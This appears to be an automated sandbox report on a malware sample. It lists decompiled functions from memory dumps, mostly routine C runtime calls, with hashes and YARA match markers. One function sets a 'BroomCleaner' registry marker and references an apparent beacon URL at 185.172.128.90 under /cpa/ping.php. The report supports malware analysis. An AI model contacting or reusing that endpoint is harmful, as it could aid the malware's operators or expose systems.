Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEBA4
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEBB6
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEBC8
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEBDA
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEBEC
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEBFE
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEC10

_free.LIBCMT ref: 05CAF7C1

Part of subcall function 05CA6501: HeapFree.KERNEL32(00000000,00000000,?,05CAF288,?,00000000,?,00000000,?,05CAF52C,?,00000007,?,?,05CAF920,?), ref: 05CA6517
Part of subcall function 05CA6501: GetLastError.KERNEL32(?,?,05CAF288,?,00000000,?,00000000,?,05CAF52C,?,00000007,?,?,05CAF920,?,?), ref: 05CA6529

_free.LIBCMT ref: 05CAF7E3
_free.LIBCMT ref: 05CAF7F8
_free.LIBCMT ref: 05CAF803
_free.LIBCMT ref: 05CAF825
_free.LIBCMT ref: 05CAF838
_free.LIBCMT ref: 05CAF846
_free.LIBCMT ref: 05CAF851
_free.LIBCMT ref: 05CAF889
_free.LIBCMT ref: 05CAF890
_free.LIBCMT ref: 05CAF8AD
_free.LIBCMT ref: 05CAF8C5

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 10a2d8f5b462584ae937c27bf30b091f4a81907735d54fb51d1b4bbc68643c17
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: 36312E37A042029FEB31AA79D888B5A7BE9FF01218F154C2DE49AD7150DF71EAC1D721

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9B2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E9FA
_free.LIBCMT ref: 0041EA1E
_free.LIBCMT ref: 0041EA2B
_free.LIBCMT ref: 0041EA50
_free.LIBCMT ref: 0041EA5D
_free.LIBCMT ref: 0041EA66
_free.LIBCMT ref: 0041ED44
_free.LIBCMT ref: 0041ED4C

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794

Uniqueness

Uniqueness Score: -1.00%

Function 00423226 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249

Strings

sqrt, xrefs: 004233CD
asin, xrefs: 004233B5
acos, xrefs: 004233C1
exp, xrefs: 0042330E, 00423370
log10, xrefs: 00423293, 004232E3
log, xrefs: 004232EF, 004232FB
pow, xrefs: 0042332D, 004233D9, 004233EC
/BB, xrefs: 0042342E

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: DecodePointer
String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-1021189420
Opcode ID: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
Opcode Fuzzy Hash: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D

Uniqueness

Uniqueness Score: -1.00%

Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416C39

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 00416C45
_free.LIBCMT ref: 00416C50
_free.LIBCMT ref: 00416C5B
_free.LIBCMT ref: 00416C66
_free.LIBCMT ref: 00416C71
_free.LIBCMT ref: 00416C7C
_free.LIBCMT ref: 00416C87
_free.LIBCMT ref: 00416C92
_free.LIBCMT ref: 00416CA0

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44

Uniqueness

Uniqueness Score: -1.00%

Function 05CA6E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05CA6EA0

Part of subcall function 05CA6501: HeapFree.KERNEL32(00000000,00000000,?,05CAF288,?,00000000,?,00000000,?,05CAF52C,?,00000007,?,?,05CAF920,?), ref: 05CA6517
Part of subcall function 05CA6501: GetLastError.KERNEL32(?,?,05CAF288,?,00000000,?,00000000,?,05CAF52C,?,00000007,?,?,05CAF920,?,?), ref: 05CA6529

_free.LIBCMT ref: 05CA6EAC
_free.LIBCMT ref: 05CA6EB7
_free.LIBCMT ref: 05CA6EC2
_free.LIBCMT ref: 05CA6ECD
_free.LIBCMT ref: 05CA6ED8
_free.LIBCMT ref: 05CA6EE3
_free.LIBCMT ref: 05CA6EEE
_free.LIBCMT ref: 05CA6EF9
_free.LIBCMT ref: 05CA6F07

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: be901797646a0e4260800d8437dd67314c21cc9c03c572fbd7b589e9e25f75e6
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: 1811B976E00109BFCB11EF95C844CD93F65EF04358B4A48A5F9498F125DA32EE90EB81

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004011B5
std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204

Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD

std::bad_exception::bad_exception.LIBCMT ref: 00401225
__CxxThrowException@8.LIBVCRUNTIME ref: 00401233
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7

Strings

bad locale name, xrefs: 0040121D

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 835844855-1405518554
Opcode ID: 63e05c14b460d685efbaffe237daf51259fe89ad88eb658e1c08f97622123781
Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
Opcode Fuzzy Hash: 63e05c14b460d685efbaffe237daf51259fe89ad88eb658e1c08f97622123781
Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 05C91417 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05C9141C
std::_Lockit::_Lockit.LIBCPMT ref: 05C9142E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05C9146B

Part of subcall function 05C980E1: _Yarn.LIBCPMT ref: 05C98100
Part of subcall function 05C980E1: _Yarn.LIBCPMT ref: 05C98124

std::bad_exception::bad_exception.LIBCMT ref: 05C9148C
__CxxThrowException@8.LIBVCRUNTIME ref: 05C9149A
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05C914BD
std::_Lockit::~_Lockit.LIBCPMT ref: 05C9152E

Strings

n~B, xrefs: 05C91417

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: n~B
API String ID: 835844855-2489732092
Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction ID: 46c1e7704c898ffc1cc758f826c9d5172a68cf9d6fe57c70c2b684fa03504f8c
Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction Fuzzy Hash: 89319F72904B41DFCB359F29D84866AFBF5FF48610B148E2FE09A92A40CB74A601DF58

Uniqueness

Uniqueness Score: -1.00%

Function 05CA9514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction ID: 2d599f8c8ff0ae0019252a34a595bccdc89ce87102c466ab5f1be9689917a444
Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction Fuzzy Hash: 8CC1F776E0824B9FDF12DFA8C846BADBFB1BF09318F084995D541A7391C7309A41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

_memcmp.LIBVCRUNTIME ref: 00414CF4
_free.LIBCMT ref: 00414D65
_free.LIBCMT ref: 00414D7E
_free.LIBCMT ref: 00414DB0
_free.LIBCMT ref: 00414DB9
_free.LIBCMT ref: 00414DC5

Strings

C, xrefs: 00414BB2

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 7e71f2d33127e387c4eb275e1e94b73233820b07264d83e7bcb68b4e40763af9
Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
Opcode Fuzzy Hash: 7e71f2d33127e387c4eb275e1e94b73233820b07264d83e7bcb68b4e40763af9
Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48

Uniqueness

Uniqueness Score: -1.00%

Function 05CA4CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05CA6F80: GetLastError.KERNEL32(?,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA6F84
Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FB7
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FF8
Part of subcall function 05CA6F80: _abort.LIBCMT ref: 05CA6FFE

_memcmp.LIBVCRUNTIME ref: 05CA4F5B
_free.LIBCMT ref: 05CA4FCC
_free.LIBCMT ref: 05CA4FE5
_free.LIBCMT ref: 05CA5017
_free.LIBCMT ref: 05CA5020
_free.LIBCMT ref: 05CA502C

Strings

C, xrefs: 05CA4E19

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 9b16aedfb5baf543daea88db484a92fdf6a02e4de3db43e444a407e1a811cd79
Instruction ID: d4c4e2c5679ac9bf5cdaf51839385465027ef6996ce5debfe0a985dfa5444562
Opcode Fuzzy Hash: 9b16aedfb5baf543daea88db484a92fdf6a02e4de3db43e444a407e1a811cd79
Instruction Fuzzy Hash: B8B12E76E0121A9FDF24DF18C888AADBBB5FF48308F1449A9D949A7350D775AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 004145CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

_free.LIBCMT ref: 004146D7
_free.LIBCMT ref: 004146EE
_free.LIBCMT ref: 0041470D
_free.LIBCMT ref: 00414728
_free.LIBCMT ref: 0041473F

Strings

B, xrefs: 0041461F
|B, xrefs: 004146B1

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free$AllocateHeap
String ID: B$|B
API String ID: 3033488037-200315465
Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
__alloca_probe_16.LIBCMT ref: 004167D1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
__alloca_probe_16.LIBCMT ref: 004168B6
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
__freea.LIBCMT ref: 00416926

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

__freea.LIBCMT ref: 0041692F
__freea.LIBCMT ref: 00416954

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDD7 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EE46
_free.LIBCMT ref: 0041EE54
_free.LIBCMT ref: 0041EF82
_free.LIBCMT ref: 0041EF8D

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98

Uniqueness

Uniqueness Score: -1.00%

Function 05CAF03E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05CAF0AD
_free.LIBCMT ref: 05CAF0BB
_free.LIBCMT ref: 05CAF1E9
_free.LIBCMT ref: 05CAF1F4

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction ID: 482ad557e6c9911ffc14371bbffb1302875c3f14694b63e5be89a7a1396db899
Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction Fuzzy Hash: 2161B577E04206AFDB20DFA4C840BAABFF5FF44714F14496AD945EB240EB709A41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 05CA4833 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05CA7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05CA7CDE

_free.LIBCMT ref: 05CA493E
_free.LIBCMT ref: 05CA4955
_free.LIBCMT ref: 05CA4974
_free.LIBCMT ref: 05CA498F
_free.LIBCMT ref: 05CA49A6

Strings

B, xrefs: 05CA4886

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: B
API String ID: 3033488037-2386870291
Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction ID: cfbed57b0c0d0f7bf2c747892e1f3faa02d81a3f32a9bc77f3a52e7dc34e6c83
Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction Fuzzy Hash: AF51C733A003069FDF28DF65DC81A6A7BF5FF45728B140969E44ADB250E771DA11DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
__fassign.LIBCMT ref: 00415AD0
__fassign.LIBCMT ref: 00415AEB
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 05CA5C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05CA63EF,?,?,?,?,?,?), ref: 05CA5CBC
__fassign.LIBCMT ref: 05CA5D37
__fassign.LIBCMT ref: 05CA5D52
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05CA5D78
WriteFile.KERNEL32(?,?,00000000,05CA63EF,00000000,?,?,?,?,?,?,?,?,?,05CA63EF,?), ref: 05CA5D97
WriteFile.KERNEL32(?,?,00000001,05CA63EF,00000000,?,?,?,?,?,?,?,?,?,05CA63EF,?), ref: 05CA5DD0

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction ID: 3b9e34d6b3f3e98bf00a40d5a4b2575a8cd84171e98a22189168bd01a9be1a4d
Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction Fuzzy Hash: 0351C071A0024AAFDF20CFA8D885AEEBBF4FF08304F14846AE541E7251D7349951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040A6FB
___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
_ValidateLocalCookies.LIBCMT ref: 0040A791
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
_ValidateLocalCookies.LIBCMT ref: 0040A811

Strings

csm, xrefs: 0040A7A6

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96

Uniqueness

Uniqueness Score: -1.00%

Function 05CB63C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05CB63C6
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 05CB63EE
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 05CB6471
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05CB6492

Strings

Installed, xrefs: 05CB63D0, 05CB63FE, 05CB641D, 05CB641E
SOFTWARE\BroomCleaner, xrefs: 05CB63CE, 05CB63E1

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: e8109d5f853c7ae9808df19006d43de870d2c6d8b4a9c41d305649b61a9f1dc2
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: BE318971A00219EEDF14DFA8C894AFEBB79FB48214F04092DE50277241C7B15E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004227A8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
Opcode Fuzzy Hash: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2AC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C

_free.LIBCMT ref: 0041F2FA

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F305
_free.LIBCMT ref: 0041F310
_free.LIBCMT ref: 0041F364
_free.LIBCMT ref: 0041F36F
_free.LIBCMT ref: 0041F37A
_free.LIBCMT ref: 0041F385

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

